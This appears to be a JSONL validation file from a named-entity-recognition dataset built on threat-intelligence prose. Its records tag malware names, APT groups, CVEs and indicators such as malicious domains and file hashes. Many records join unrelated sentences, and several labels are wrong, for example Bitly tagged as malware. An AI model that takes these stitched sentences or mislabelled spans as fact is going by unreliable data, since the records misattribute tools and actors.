{"text": "We found no other information stolen from the victims to be accessible . Also , some code pieces are directly re-used in the analyzed campaigns , such as the i.cmd and exit.exe files , and , at the same time , some new components have been introduced , for instance the rtegre.exe” and the veter1605_MAPS_10cr0.exe file . The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control ( C2 ) server to a victim 's system via dual proxies .", "spans": {"Malware: i.cmd": [[158, 163]], "Malware: exit.exe": [[168, 176]], "Malware: rtegre.exe”": [[270, 281]], "Malware: veter1605_MAPS_10cr0.exe": [[290, 314]], "Malware: RAT": [[356, 359]]}, "info": {"id": "cyberner_stix_valid_000843", "source": "cyberner_stix_valid"}}
{"text": "READ_EXTERNAL_STORAGE - Allows the application to read from external storage . One of the most prolific APT-style cyberattacks , specifically targeting the financial sector , is known as Carbanak . One interesting note about the criminal activity of Gorgon Group is their usage of Bitly .", "spans": {"Organization: financial": [[156, 165]], "Malware: Bitly": [[281, 286]]}, "info": {"id": "cyberner_stix_valid_000844", "source": "cyberner_stix_valid"}}
{"text": "The timeframe maps to the second half of the workday in China .", "spans": {}, "info": {"id": "cyberner_stix_valid_000845", "source": "cyberner_stix_valid"}}
{"text": "In a previous campaign reported by JPCERT , mobile users were alerted by phishy messages containing “ delivery updates ” purportedly from Sagawa Express . Almost 60% of the suspected APT33 domains that were classified to malware families related to njRAT infections , a RAT not previously associated with APT33 activity . It is highly likely that this threat is far more widespread and we urge financial institutions around the world to scan their networks for signs of the Metel malware .", "spans": {"Organization: JPCERT": [[35, 41]], "Organization: Sagawa Express": [[138, 152]], "Organization: financial institutions": [[394, 416]], "Malware: Metel": [[474, 479]], "Malware: malware": [[480, 487]]}, "info": {"id": "cyberner_stix_valid_000846", "source": "cyberner_stix_valid"}}
{"text": "Continued mirroring suggests it is likely a regularly cleaned staging server . A researcher has attributed a recently publicized attack on Citrix' internal network to the Iranian-linked group known as IRIDIUM – and said that the data heist involved 6 terabytes of sensitive data . aoldaily.com aunewsonline.com canadatvsite.com canoedaily.com cnndaily.com cnndaily.net cnnnewsdaily.com defenceonline.net freshreaders.net giftnews.org reutersnewsonline.com rssadvanced.org saltlakenews.org sportreadok.net todayusa.org usapappers.com usnewssite.com yahoodaily.com . Our gathered field data shows the following statistics on CSP usage across the Internet ( based on HTTPArchive March 2020 scan ):", "spans": {"Organization: Citrix'": [[139, 146]], "Indicator: aoldaily.com": [[281, 293]], "Indicator: aunewsonline.com": [[294, 310]], "Indicator: canadatvsite.com": [[311, 327]], "Indicator: canoedaily.com": [[328, 342]], "Indicator: cnndaily.com": [[343, 355]], "Indicator: cnndaily.net": [[356, 368]], "Indicator: cnnnewsdaily.com": [[369, 385]], "Indicator: defenceonline.net": [[386, 403]], "Indicator: freshreaders.net": [[404, 420]], "Indicator: giftnews.org": [[421, 433]], "Indicator: reutersnewsonline.com": [[434, 455]], "Indicator: rssadvanced.org": [[456, 471]], "Indicator: saltlakenews.org": [[472, 488]], "Indicator: sportreadok.net": [[489, 504]], "Indicator: todayusa.org": [[505, 517]], "Indicator: usapappers.com": [[518, 532]], "Indicator: usnewssite.com": [[533, 547]], "Indicator: yahoodaily.com": [[548, 562]], "System: CSP": [[623, 626]], "System: Internet": [[644, 652]], "System: HTTPArchive": [[664, 675]]}, "info": {"id": "cyberner_stix_valid_000847", "source": "cyberner_stix_valid"}}
{"text": "With Cybereason Mobile , analysts can address mobile threats in the same platform as traditional endpoint threats , all as part of one incident . The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world .", "spans": {"System: Cybereason Mobile": [[5, 22]], "Malware: st07383.en17.docx": [[158, 175]], "Vulnerability: CVE-2017-0001": [[226, 239]], "Malware: SHIRIME": [[345, 352]], "Malware: MSP networks": [[459, 471]], "Organization: customers": [[493, 502]]}, "info": {"id": "cyberner_stix_valid_000848", "source": "cyberner_stix_valid"}}
{"text": "PINCHDUKE : First known activity November 2008 , Most recent known activity Summer 2010 , C&C communication methods HTTP(S) , Known toolset components Multiple loaders , Information stealer .", "spans": {"Malware: PINCHDUKE": [[0, 9]]}, "info": {"id": "cyberner_stix_valid_000849", "source": "cyberner_stix_valid"}}
{"text": "In one of their more intriguing cases , the Dukes have appeared to also target entities involved in the trafficking of illegal drugs .", "spans": {}, "info": {"id": "cyberner_stix_valid_000850", "source": "cyberner_stix_valid"}}
{"text": "The Event Action Trigger module triggers malicious actions based on certain events . The Charming Kitten' focus appears to be individuals of interest to Iran in the fields of academic research . However the values are dependent on opaque predicates results . Mandiant observed UNC4899 utilize various VPN providers as a final hop , the most common being ExpressVPN , but connections to NordVPN , TorGuard and many other providers have also been observed .", "spans": {"Organization: academic research": [[175, 192]], "Organization: Mandiant": [[259, 267]], "System: VPN providers": [[301, 314]], "System: ExpressVPN": [[354, 364]], "System: NordVPN": [[386, 393]], "System: TorGuard": [[396, 404]]}, "info": {"id": "cyberner_stix_valid_000851", "source": "cyberner_stix_valid"}}
{"text": "CNIIHM ’s characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity .", "spans": {"Organization: CNIIHM": [[0, 6]]}, "info": {"id": "cyberner_stix_valid_000852", "source": "cyberner_stix_valid"}}
{"text": "The cyber industry of mobile malware is becoming more focused on making profits more effectively , i.e. , mobile phishing , theft of credit card information , money transfers from bank cards to mobile phones and from phones to the criminalas ’ e-wallets . The backdoor noted by other security researchers was encoded with different algorithms and configured with different parameter names in 2016 , for instance . Once ShadowPad is injected into wmplayer.exe , the Online module will contact the C&C server using the URL specified in the configuration . A riskaverse actor , Iran generally seeks to avoid direct military confrontation against conventionally superior foes .", "spans": {"Malware: ShadowPad": [[419, 428]], "Indicator: wmplayer.exe": [[446, 458]]}, "info": {"id": "cyberner_stix_valid_000853", "source": "cyberner_stix_valid"}}
{"text": "The goal of this code is to get information from the properties of the document ( \"Subject\" , \"Company\" , \"Category\" , \"Hyperlink base\" and finally \"Comments\" ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000854", "source": "cyberner_stix_valid"}}
{"text": "All Lookout customers are protected from this threat . In April , shortly after the Trojan 's discovery , researchers observed a massive GozNym campaign targeting 24 North American banks . The BISCUIT backdoor ( so named for the command “ bdkzt ” ) is an illustrative example of the range of commands that APT1 has built into its “ standard ” backdoors . Kaspersky has more here .", "spans": {"Organization: Lookout": [[4, 11]], "Organization: banks": [[181, 186]], "Malware: BISCUIT backdoor": [[193, 209]], "Malware: bdkzt": [[239, 244]], "Organization: Kaspersky": [[355, 364]]}, "info": {"id": "cyberner_stix_valid_000855", "source": "cyberner_stix_valid"}}
{"text": "] net linkdatax [ . For example , the group has repeatedly targeted call record information at telecom companies . In the investigations Mandiant has conducted , it appeared that APT29 deployed POSHSPY as a secondary backdoor for use if they lost access to their primary backdoors .", "spans": {"Organization: telecom": [[95, 102]], "Organization: companies": [[103, 112]], "Organization: Mandiant": [[137, 145]], "Malware: POSHSPY": [[194, 201]]}, "info": {"id": "cyberner_stix_valid_000856", "source": "cyberner_stix_valid"}}
{"text": "FireEye believes that two actors – Turla and an unknown financially motivated actor – were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 . Cybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed central Asian country in order to conduct watering hole attacks .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: financially": [[56, 67]], "Vulnerability: CVE-2017-0261": [[120, 133]], "Vulnerability: CVE-2017-0262": [[180, 193]], "Vulnerability: CVE-2017-0263": [[250, 263]], "Organization: Cybersecurity": [[266, 279]]}, "info": {"id": "cyberner_stix_valid_000857", "source": "cyberner_stix_valid"}}
{"text": "Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . The OSX_DOK malware ( Detected by Trend Micro as OSX_DOK.C ) showcases sophisticated features such as certificate abuse and security software evasion that affects machines using Apple ’s OS X operating system .", "spans": {"Malware: TajMahal": [[37, 45]], "Malware: OSX_DOK": [[136, 143]], "Malware: malware": [[144, 151]], "Organization: Trend Micro": [[166, 177]], "Malware: OSX_DOK.C": [[181, 190]], "System: Apple ’s OS X": [[310, 323]]}, "info": {"id": "cyberner_stix_valid_000858", "source": "cyberner_stix_valid"}}
{"text": "After installation , the user needs to run the application . When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East , we were somewhat confused as the previous public reporting had attributed these attacks to FIN7 . Our systems were able to record the hash of file tmp.vbs , but the contents of the file are no longer available . The code is obfuscated , using an obfuscator script , based on the fact that some comments the actor did n’t strip are also obfuscated when the words written in the comments are not recognized as a part of the VBA syntax .", "spans": {"Indicator: tmp.vbs": [[336, 343]]}, "info": {"id": "cyberner_stix_valid_000859", "source": "cyberner_stix_valid"}}
{"text": "'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . The well-crafted and socially engineered malicious documents then become the first stage of a long and mainly fileless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group .", "spans": {"Malware: 'Improvise'": [[0, 11]], "Indicator: POWERSTATS": [[403, 413]], "Indicator: PowerShell backdoor": [[428, 447]]}, "info": {"id": "cyberner_stix_valid_000860", "source": "cyberner_stix_valid"}}
{"text": "Scarlet Mimic has carried out attacks using both spear-phishing and watering holes since at least 2009 with increasingly advanced malware , and has deployed malware to attack multiple operating systems and platforms . Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers .", "spans": {"Organization: governmental": [[255, 267]], "Organization: embassies": [[308, 317]], "Organization: aerospace": [[339, 348]], "Organization: defence Industries": [[353, 371]], "Organization: financial institutions": [[374, 396]], "Organization: journalists": [[399, 410]], "Organization: software developers": [[413, 432]]}, "info": {"id": "cyberner_stix_valid_000861", "source": "cyberner_stix_valid"}}
{"text": "It is quite unusual to find an actual organization behind mobile malware , as most of them are developed by purely malicious actors . ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities . It will then retry the connection with the next remote host , if there is one . Sandworm ’s Threat Activity Reveals Insights into Russia ’s Offensive Cyber Capabilities", "spans": {}, "info": {"id": "cyberner_stix_valid_000862", "source": "cyberner_stix_valid"}}
{"text": "Based on this , we believe the Rancor attackers were targeting political entities . Let’s take a closer look at ITG08’s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor .", "spans": {"Organization: political entities": [[63, 81]], "Indicator: More_eggs backdoor": [[275, 293]]}, "info": {"id": "cyberner_stix_valid_000863", "source": "cyberner_stix_valid"}}
{"text": "The configuration file contains a list of financial applications that can be targeted by EventBot . While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) . To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys .", "spans": {"Malware: EventBot": [[89, 97]], "Organization: Symantec": [[106, 114]], "Malware: Filensfer": [[145, 154]], "Malware: Buckeye malware": [[306, 321]], "Indicator: c:\\temp\\rr.exe": [[395, 409]]}, "info": {"id": "cyberner_stix_valid_000864", "source": "cyberner_stix_valid"}}
{"text": "Additionally , early variants of KASPERAGENT used “ Chrome ”", "spans": {"Malware: KASPERAGENT": [[33, 44]]}, "info": {"id": "cyberner_stix_valid_000865", "source": "cyberner_stix_valid"}}
{"text": "Secure logs in a centralized location and protect them from modification .", "spans": {}, "info": {"id": "cyberner_stix_valid_000866", "source": "cyberner_stix_valid"}}
{"text": "Riltok mobile Trojan : A banker with global reach 25 JUN 2019 Riltok is one of numerous families of mobile banking Trojans with standard ( for such malware ) functions and distribution methods . Symantec did not observe the initial access point and the close timeframe between Waterbug observed activity on the victim’s network and its observed use of Crambus infrastructure suggests that Waterbug may have used the Crambus infrastructure as an initial access point . The current version of the malware allows the operator to steal files , keystrokes , perform screenshots , and execute arbitrary code on the infected host .", "spans": {"Malware: Riltok": [[0, 6], [62, 68]], "Organization: Symantec": [[195, 203]], "Organization: Crambus infrastructure": [[416, 438]]}, "info": {"id": "cyberner_stix_valid_000867", "source": "cyberner_stix_valid"}}
{"text": "To date , Sowbug appears to be focused mainly on government entities in South America and Southeast Asia and has infiltrated organizations in Argentina , Brazil , Ecuador , Peru , Brunei and Malaysia . While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions .", "spans": {"Organization: government entities": [[49, 68]], "Organization: infiltrated organizations": [[113, 138]], "Organization: SOC personnel": [[238, 251]]}, "info": {"id": "cyberner_stix_valid_000868", "source": "cyberner_stix_valid"}}
{"text": "The chat application acts as a dropper for this second-stage payload app . Since the Bangladesh incident there have been just a few articles explaining the connection between Lazarus Group and the Bangladesh bank heist . Elfin : Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S . KillNet ’s targeting has consistently aligned with established and emerging Russian geopolitical priorities , which suggests that at least part of the influence component of this hacktivist activity is intended to directly promote Russia 's interests within perceived adversary nations vis - a - vis the invasion of Ukraine .", "spans": {"Organization: bank": [[208, 212]], "Organization: Ukraine": [[629, 636]]}, "info": {"id": "cyberner_stix_valid_000869", "source": "cyberner_stix_valid"}}
{"text": "Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors .", "spans": {"Vulnerability: CVE-2017-11882": [[37, 51]], "Vulnerability: (CVE-2017-11882)": [[146, 162]], "Vulnerability: CVE-2012-0158": [[225, 238]]}, "info": {"id": "cyberner_stix_valid_000870", "source": "cyberner_stix_valid"}}
{"text": "It also drops decoy documents in an attempt to camouflage the attack .", "spans": {}, "info": {"id": "cyberner_stix_valid_000871", "source": "cyberner_stix_valid"}}
{"text": "However , we can reassemble the whole infection procedure based on our telemetry .", "spans": {}, "info": {"id": "cyberner_stix_valid_000872", "source": "cyberner_stix_valid"}}
{"text": "Upon clicking the ads , the malware author receives payment from the website developer , which pays for the illegitimate clicks and traffic . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security . with the server . This is analogous to antivirus solutions using known virus signatures to determine if a computing interaction suggests virus installation or malware delivery across the network .", "spans": {"Organization: Department of Homeland Security": [[214, 245]]}, "info": {"id": "cyberner_stix_valid_000873", "source": "cyberner_stix_valid"}}
{"text": "TG-1314 was mapping network drives using a compromised Altiris account to connect to additional systems .", "spans": {}, "info": {"id": "cyberner_stix_valid_000874", "source": "cyberner_stix_valid"}}
{"text": "XLoader can also hijack the infected device ( i.e. , send SMSs ) and sports self-protection/persistence mechanisms through device administrator privileges . Arbor also published APT research on this group , and named it ‘Donot’ . After that , it executes “ exit.exe ” which launches the “ i.cmd ” batch script .", "spans": {"Malware: XLoader": [[0, 7]], "Organization: Arbor": [[157, 162]], "Indicator: exit.exe": [[257, 265]], "Indicator: i.cmd": [[289, 294]]}, "info": {"id": "cyberner_stix_valid_000875", "source": "cyberner_stix_valid"}}
{"text": "It constructs this list using the WMI query : “SELECT displayName FROM AntivirusProduct ” .", "spans": {"System: WMI": [[34, 37]]}, "info": {"id": "cyberner_stix_valid_000876", "source": "cyberner_stix_valid"}}
{"text": "Hotfixmsupload.com is particularly interesting as it has been identified as a Sofacy C2 domain repeatedly , and was also brought forth by Microsoft in a legal complaint against STRONTIUM ( Sofacy ) as documented here .", "spans": {"Indicator: Hotfixmsupload.com": [[0, 18]], "Organization: Microsoft": [[138, 147]]}, "info": {"id": "cyberner_stix_valid_000877", "source": "cyberner_stix_valid"}}
{"text": "CapabilitiesFormBook is a data stealer , but not a full-fledged banker . Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) .", "spans": {"Organization: CapabilitiesFormBook": [[0, 20]], "Organization: banker": [[64, 70]], "Organization: bank employees": [[127, 141]]}, "info": {"id": "cyberner_stix_valid_000878", "source": "cyberner_stix_valid"}}
{"text": "Network : Presence of http and DNS traffic to the network IOCs shared above .", "spans": {}, "info": {"id": "cyberner_stix_valid_000879", "source": "cyberner_stix_valid"}}
{"text": "We observed all these characteristics in the Bisonal 's attacks against both Russia and South Korea . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider .", "spans": {"Malware: Carbanak": [[250, 258]]}, "info": {"id": "cyberner_stix_valid_000880", "source": "cyberner_stix_valid"}}
{"text": "] somtum [ . The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits . But we do know the change was sudden . Beginning in January 2021 , Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment .", "spans": {"Organization: Tibetan Parliamentarians": [[39, 63]], "Malware: malicious attachments": [[97, 118]], "Organization: Mandiant Managed Defense": [[230, 254]], "System: Microsoft Exchange Server": [[295, 320]]}, "info": {"id": "cyberner_stix_valid_000881", "source": "cyberner_stix_valid"}}
{"text": "Jane ’s by IHSMarkit is a well-known supplier of information and analysis often times associated with the defense and government sector .", "spans": {"Organization: IHSMarkit": [[11, 20]]}, "info": {"id": "cyberner_stix_valid_000882", "source": "cyberner_stix_valid"}}
{"text": "As part of the disclosure , Ormandy also included the source code for a proof-of- concept exploit for the vulnerability .", "spans": {}, "info": {"id": "cyberner_stix_valid_000883", "source": "cyberner_stix_valid"}}
{"text": "Below is a collection of API methods and a brief description around their purpose . e uncovered the activity of a hacking group which has Chinese origins . At this point , the ZxShell library is no longer linked in the module list of the host process . In other highly successful runs , the actor sent out phony Flash videos directly as email attachments .", "spans": {"Malware: ZxShell": [[176, 183]]}, "info": {"id": "cyberner_stix_valid_000884", "source": "cyberner_stix_valid"}}
{"text": "Hence , we name this new spin-off campaign as Jaguar Kill Switch . The documents that exploit CVE2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe . The main attack vector is via email with crafted Word , Excel or PDF documents attached . If you ’re a user in Ukraine or Poland , especially someone working in the government or military sectors , this is a clear - cut example of a spam campaign targeting this population .", "spans": {"Vulnerability: CVE2017-11882": [[94, 107]], "Malware: HTA": [[157, 160]], "Malware: mshta.exe": [[290, 299]], "Organization: the government": [[463, 477]], "Organization: military sectors": [[481, 497]]}, "info": {"id": "cyberner_stix_valid_000885", "source": "cyberner_stix_valid"}}
{"text": "These attacks show significant similarities to previously documented attacks attributed to the Arabic-speaking threat actor , commonly referred to as the MoleRATs group ( aka , The Gaza Cybergang , Moonlight , DustySky , Gaza Hacker Team ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000886", "source": "cyberner_stix_valid"}}
{"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users .", "spans": {"Malware: flare-qdb": [[18, 27]], "Vulnerability: Nitris Exploit Kit": [[113, 131]], "Vulnerability: CottonCastle": [[153, 165]]}, "info": {"id": "cyberner_stix_valid_000887", "source": "cyberner_stix_valid"}}
{"text": "Below is a description of the most noteworthy : The implant is able to spy on all available device sensors and to log registered events . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 . APT33 : d5262f1bc42d7d5d0ebedadd8ab90a88d562c7a90ff9b0aed1b3992ec073e2b0 S-SHA2 Quasar RAT . The group itself likes to pretend to be a cybersecurity organization as shown in the ransom note below .", "spans": {"Vulnerability: CVE-2015-8651": [[285, 298]], "Vulnerability: CVE-2016-1019": [[301, 314]], "Vulnerability: CVE-2016-4117": [[321, 334]], "Malware: d5262f1bc42d7d5d0ebedadd8ab90a88d562c7a90ff9b0aed1b3992ec073e2b0 S-SHA2 Quasar RAT": [[345, 427]], "Organization: cybersecurity organization": [[472, 498]]}, "info": {"id": "cyberner_stix_valid_000888", "source": "cyberner_stix_valid"}}
{"text": "This exercise revealed tons of information about techniques used by FinFisher that we used to make Office 365 ATP more resistant to sandbox detection and Windows Defender ATP to catch similar techniques and generic behaviors . Organizations located in Myanmar and targeted by Spring Dragon have gone unmentioned . The UnInstall command doesn’t remove the malware from the system . While many statesponsored threat actors engage in spear phishing , ransomware is the preferred weapon of these cybercriminals .", "spans": {"Malware: FinFisher": [[68, 77]], "System: Office 365 ATP": [[99, 113]], "System: Windows Defender ATP": [[154, 174]]}, "info": {"id": "cyberner_stix_valid_000889", "source": "cyberner_stix_valid"}}
{"text": "Rooting trojans The Zen authors have also created a rooting trojan . In addition , the NetTraveler toolkit was able to install additional info-stealing malware as a backdoor , and it could be customized to steal other types of sensitive information such as configuration details for an application or computer-aided design files . This tactic exploits users ’ reduced vigilance when reading their own personal email , even when using corporate IT equipment to do so . However , users reported that the fix was causing Safari to not connect correctly to major websites like Facebook , Instagram and Zoom , leading Apple to pull back the patch .", "spans": {"Malware: Zen": [[20, 23]], "Organization: Apple": [[613, 618]]}, "info": {"id": "cyberner_stix_valid_000890", "source": "cyberner_stix_valid"}}
{"text": "Interestingly , we uncovered several expired job posting of Android reverse engineer from the actor ’ s front business published in 2018 and 2019 . Hackers gained access to a computer in the trading system in September 2014 . We monitored the activities of these groups and the new malware they are creating for over a year . “ Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse , ” the report states .", "spans": {"System: Android": [[60, 67]]}, "info": {"id": "cyberner_stix_valid_000891", "source": "cyberner_stix_valid"}}
{"text": "Unit 42 researchers observed the Quasar RA being prevented from executing on a Traps-protected client in September 2016 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000892", "source": "cyberner_stix_valid"}}
{"text": "After app installation , whenever SWAnalytics senses victims opening up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . During their previous campaign , we found Confucius using fake romance websites to entice victims into installing malicious Android applications .", "spans": {"Malware: SWAnalytics": [[34, 45]], "System: Android": [[349, 356]]}, "info": {"id": "cyberner_stix_valid_000893", "source": "cyberner_stix_valid"}}
{"text": "National political director Finance director Director of strategic communications Director of scheduling Director of travel Traveling press secretary Travel coordinator .", "spans": {}, "info": {"id": "cyberner_stix_valid_000894", "source": "cyberner_stix_valid"}}
{"text": "The infrastructure has several layers , although not being very dynamic , still has several layers each one providing some level of protection . Given the use of lure documents designed with social engineering in mind , it is likely that MuddyWater use phishing or spam to target users who are unaware of these documents ' malicious nature . Looks for a Windows device named \\Device\\acpi_010221 . n July 2019 , we discovered an interesting VBScript named Chrome.vbs ( SHA256 : 0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2 ) associated with the Rancor group . Following a three - month lull of activity , Cl0p returned with a vengeance in June and beat out LockBit as the month ’s most active ransomware gang .", "spans": {"System: Windows": [[354, 361]], "Indicator: Chrome.vbs": [[455, 465]], "Indicator: 0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2": [[477, 541]]}, "info": {"id": "cyberner_stix_valid_000895", "source": "cyberner_stix_valid"}}
{"text": "Figure 3 . In August 2019 , FireEye released the Double Dragon” report on our newest graduated threat group , APT41 . Upload a specific file based on the full path name .", "spans": {"Organization: FireEye": [[28, 35]]}, "info": {"id": "cyberner_stix_valid_000896", "source": "cyberner_stix_valid"}}
{"text": "Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers . attacks on the chemical industry are merely their latest attack wave .", "spans": {"Vulnerability: CVE-2015-2546": [[8, 21]], "Organization: chemical industry": [[195, 212]]}, "info": {"id": "cyberner_stix_valid_000897", "source": "cyberner_stix_valid"}}
{"text": "The second Project Spy version has similar capabilities to the first version , with the addition of the following : Stealing notification messages sent from WhatsApp , Facebook , and Telegram Abandoning the FTP mode of uploading the recorded images Aside from changing the app ’ s supposed function and look , the second and third versions ’ codes had little differences . In all , Kaspersky Lab discovered Metel in more than 30 financial institutions . For example , According to Kaspersky telemetry , targeted organizations included think tanks and individuals working in various areas related to security and geopolitics .", "spans": {"Malware: Project Spy": [[11, 22]], "System: WhatsApp": [[157, 165]], "System: Facebook": [[168, 176]], "System: Telegram": [[183, 191]], "Organization: Kaspersky Lab": [[382, 395]], "Organization: financial institutions": [[429, 451]], "Organization: Kaspersky": [[481, 490]], "Organization: think tanks": [[535, 546]], "Organization: individuals working in various areas related to security and geopolitics": [[551, 623]]}, "info": {"id": "cyberner_stix_valid_000898", "source": "cyberner_stix_valid"}}
{"text": "If the directory creation fails it tries to install into “ %TEMP% ” directory instead .", "spans": {}, "info": {"id": "cyberner_stix_valid_000899", "source": "cyberner_stix_valid"}}
{"text": "60 % of devices containing or accessing enterprise data are mobile , and mobile devices tend to include a significant amount of personal and business data , assuming the organization has a bring-your-own-device policy in place . The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"Malware: exploit document": [[233, 249]], "Malware: decoy document": [[307, 321]], "Organization: individual": [[455, 465]]}, "info": {"id": "cyberner_stix_valid_000900", "source": "cyberner_stix_valid"}}
{"text": "The primary targets , so far , are based in India though other Asian countries such as Pakistan and Bangladesh are also affected . While we did not discuss the surrounding attacks using Bookworm in detail , we have observed threat actors deploying Bookworm primarily in attacks on targets in Thailand . The post continues , “ during 2016 , we observed a heavy interest in Angola , exemplified by lure documents indicating targets with suspected ties to oil , money laundering , and other illicit activities . PoetRAT used TLS to encrypt communications over port 143 QuasarRAT can use port 4782 on the compromised host for TCP callbacks .", "spans": {"Malware: PoetRAT": [[509, 516]], "System: TLS": [[522, 525]], "Malware: QuasarRAT": [[566, 575]]}, "info": {"id": "cyberner_stix_valid_000901", "source": "cyberner_stix_valid"}}
{"text": "We have previously observed APT19 steal data from law and investment firms for competitive economic purposes . After reviewing all the malware functionalities , we are confident in saying that the attackers look for victims who answer well-defined characteristics and believe that further stages of the attack are delivered only to those who fit the specific victim profile .", "spans": {"Organization: victims who answer": [[216, 234]]}, "info": {"id": "cyberner_stix_valid_000902", "source": "cyberner_stix_valid"}}
{"text": "It captures information using plugins to compromise webcam and microphone output along with documenting log keystrokes , carrying out surveillance and access external drives . For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora .", "spans": {"Organization: civil society": [[305, 318]], "Organization: diaspora": [[323, 331]]}, "info": {"id": "cyberner_stix_valid_000903", "source": "cyberner_stix_valid"}}
{"text": "The collected data can then be used to generate a unique identifier of the bot or for monetization purposes . PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . In August 2018 , Unit 42 observed OilRig targeting a government organization using spear-phishing emails to deliver an updated version of a Trojan known as BONDUPDATER .", "spans": {"Vulnerability: Heartbleed vulnerability": [[146, 170]], "Organization: Unit 42": [[233, 240]], "Organization: government organization": [[269, 292]], "Malware: Trojan": [[356, 362]], "Malware: BONDUPDATER": [[372, 383]]}, "info": {"id": "cyberner_stix_valid_000904", "source": "cyberner_stix_valid"}}
{"text": "The credentials they use to register their malware infrastructure are easily associated with their public social media accounts on Google® , Facebook® , MySpace® , Instagram® , and various dating and blogging sites . We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe .", "spans": {"Organization: social media": [[106, 118]], "Organization: Google®": [[131, 138]], "Organization: Facebook®": [[141, 150]], "Organization: MySpace®": [[153, 161]], "Organization: Instagram®": [[164, 174]], "Organization: dating and blogging sites": [[189, 214]], "Malware: Kazuar tool": [[232, 243]], "Organization: embassies": [[372, 381]], "Organization: defense contractors": [[384, 403]], "Organization: educational institutions": [[406, 430]], "Organization: research organizations": [[437, 459]]}, "info": {"id": "cyberner_stix_valid_000905", "source": "cyberner_stix_valid"}}
{"text": "Instead , they opted for minimal downtime and attempted to continue operations , with only minor modifications to the toolset .", "spans": {}, "info": {"id": "cyberner_stix_valid_000906", "source": "cyberner_stix_valid"}}
{"text": "cecilia-gilbert [ . It wasn't until August 2014 that we observed something which made us wonder if RedOctober is back for good . As always , keep in mind that these uses are confirmed uses , and likely represent only a small fraction of APT1 ’s total activity . Greatness , for now , is only focused on Microsoft 365 phishing pages , providing its affiliates with an attachment and link builder that creates highly convincing decoy and login pages .", "spans": {}, "info": {"id": "cyberner_stix_valid_000907", "source": "cyberner_stix_valid"}}
{"text": "If an attacker wanted to exploit CVE-2015-1701 , they would first have to be executing code on the victim ’s machine .", "spans": {"Vulnerability: CVE-2015-1701": [[33, 46]]}, "info": {"id": "cyberner_stix_valid_000908", "source": "cyberner_stix_valid"}}
{"text": "The kill switch can also be turned on by SMS . APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia . Secondary ProjectSauron modules are designed to perform specific functions like stealing documents , recording keystrokes , and hijacking encryption keys from both infected computers and attached USB sticks .", "spans": {"Organization: military": [[216, 224]], "Malware: ProjectSauron modules": [[290, 311]]}, "info": {"id": "cyberner_stix_valid_000909", "source": "cyberner_stix_valid"}}
